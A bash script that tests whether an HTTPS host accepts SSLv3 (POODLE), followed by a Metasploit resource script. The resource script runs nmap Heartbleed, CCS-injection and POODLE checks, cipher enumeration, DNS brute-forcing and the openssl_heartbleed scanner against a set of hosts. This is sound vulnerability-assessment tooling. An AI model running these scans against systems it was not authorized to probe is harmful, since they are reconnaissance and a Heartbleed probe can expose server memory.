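#!/bin/bash
# poodle check: tests whether an HTTPS endpoint still accepts SSLv3.
#
# Prompts for a target host, attempts an SSLv3-only handshake against
# port 443 with `openssl s_client -ssl3`, and reports the outcome.
#
# Exit status:
#   0 - no SSLv3 session could be established
#   1 - an SSLv3 session was established, or the connection timed out
#       (kept as in the original script, so callers cannot tell the two
#       apart by status alone; read the message)
#   2 - no verdict possible (bad input, or the local openssl has no SSLv3)
#
# Reading the result:
#   * A completed SSLv3 handshake shows the protocol is enabled on the
#     server. POODLE targets CBC-mode ciphers in SSLv3, so the negotiated
#     cipher printed below is part of the finding, not decoration.
#   * A failed handshake is only meaningful if the local openssl can offer
#     SSLv3 at all. Many current builds are compiled without it, and local
#     policy (minimum protocol version / security level) may also block
#     it; in both cases the server was not really tested.

# Optional: bound the handshake with timeout(1) when it is installed.
timeout_bin=$(command -v timeout 2>/dev/null)
runner=()
if [[ -n "$timeout_bin" ]]; then
  runner=("$timeout_bin" 5)
fi

if ! command -v openssl >/dev/null 2>&1; then
  echo "error: openssl not found in PATH" >&2
  exit 2
fi

# Without this check a build lacking SSLv3 rejects the -ssl3 option and
# the script would print "Not vulnerable" for every host (false negative).
# Relies on s_client listing -ssl3 in its usage text when it is supported.
help_text=$(openssl s_client -help 2>&1)
if [[ "$help_text" != *-ssl3* ]]; then
  echo "error: local openssl has no SSLv3 support; cannot test" >&2
  exit 2
fi

echo -e "[*] Input Target RHOST - example: 192.44.100.86"
echo -n "[>]:"
read -r _target

# Accept only characters that can occur in a hostname or IP literal. An
# empty or malformed target must not fall through to a "Not vulnerable"
# verdict, and nothing typed here should be able to add openssl options.
valid_target_re='^[][A-Za-z0-9._:-]+$'
if [[ ! "$_target" =~ $valid_target_re ]]; then
  echo "error: invalid target host" >&2
  exit 2
fi

echo ""
echo -n "[*] $_target:443 - "

# 'Q' on stdin makes s_client quit once the handshake has finished.
# No pipefail here: the status captured is that of timeout/openssl.
out=$(echo 'Q' | "${runner[@]}" openssl s_client -ssl3 -connect "${_target}:443" 2>/dev/null)
status=$?

# timeout(1) exits with 124 when it had to kill the command.
if (( status == 124 )); then
  echo "error: Timeout connecting to host!"
  exit 1
fi

if ! grep -q 'Cipher is' <<<"$out"; then
  echo 'Not vulnerable. Failed to establish SSL connection.'
  exit 0
fi

# Third field of the "Protocol  : ..." / "Cipher    : ..." session lines.
proto=$(awk '/^ *Protocol *:/ { print $3 }' <<<"$out")
cipher=$(awk '/^ *Cipher *:/ { print $3 }' <<<"$out")

# s_client reports cipher 0000 or (NONE) when no session was negotiated.
if [[ "$cipher" == '0000' || "$cipher" == '(NONE)' ]]; then
  echo 'Not vulnerable. Failed to establish SSLv3 connection.'
  exit 0
else
  echo "Vulnerable! SSLv3 connection established using: $proto/$cipher"
  exit 1
fi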
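#--------------------------->
# Metasploit resource script: SSL/TLS exposure sweep on port 443 of the
# hosts in the global RHOSTS value (set with `setg RHOSTS ...`).
#
# Order of work: refresh the NSE script database, run two nmap passes,
# run the msf auxiliary scanners, then run the SSLv3 helper script.
<ruby>
rhosts = framework.datastore['RHOSTS']

print_line("")
print_good("please Wait, updating [ NSE ] database...")
run_single("nmap --script-updatedb")
print_line("")
print_status("Please wait, checking if RHOSTS is set globally...")
# An empty string is as unusable as nil: nmap would be started with no target.
if rhosts.nil? || rhosts.to_s.strip.empty?
  print_error("[ERROR] Please set RHOSTS globally: setg RHOSTS xxx.xxx.xxx.xxx")
  # NOTE(review): confirm whether this also stops the console commands
  # further down, or only leaves this <ruby> block.
  return
end

# Plain `nmap` only writes its reports to the -oN files in the current
# directory; nothing is imported into the Metasploit database (that would
# take db_nmap). The value of RHOSTS is pasted into the command line as-is.
# dns-brute and ip-geolocation-geoplugin also generate traffic to DNS and
# to a third-party geolocation service, not only to RHOSTS.
print_good("RHOSTS set globally [ OK ], running scans...")
run_single("nmap -n -sS -Pn -oN LiLiP4tH --script ssl-ccs-injection.nse,ssl-heartbleed.nse --script-args vulns.showall -p 443 #{rhosts}")
run_single("nmap -T4 -sV -Pn -oN Lt0P4tH --script ssl-poodle.nse,ssl-cert.nse,ssl-enum-ciphers.nse,dns-brute.nse,ip-geolocation-geoplugin.nse -p 443 #{rhosts}")
print_line("")
print_good("Please wait, running msf auxiliary modules...")
</ruby>
use auxiliary/scanner/http/ssl_version
run
use auxiliary/scanner/http/ssl
run
use auxiliary/scanner/ssl/openssl_heartbleed
run
# Selected but never run. Going by its path this is a server-type module
# rather than a scan of RHOSTS, so this line only changes the active module.
use auxiliary/server/openssl_heartbeat_client_memory
# Running the SSLv3 (POODLE) connection check
<ruby>
# The helper lives at a fixed name in world-writable /tmp and is executed
# with the privileges of this console (the -sS scan above normally means
# root). Run it only if it belongs to the current user and nobody else can
# write to it; otherwise another local account could have supplied it.
# The helper is interactive: it prompts for its own target and does not
# read RHOSTS.
helper = "/tmp/poodle.sh"
print_line("")
if !File.file?(helper)
  print_error("#{helper} not found, skipping SSLv3 check")
else
  st = File.stat(helper)
  if !st.owned? || (st.mode & 0o022) != 0
    print_error("#{helper} is not owned by the current user or is group/world-writable, refusing to run it")
  else
    print_good("trying to connect to openssl...")
    run_single(helper)
  end
end
</ruby>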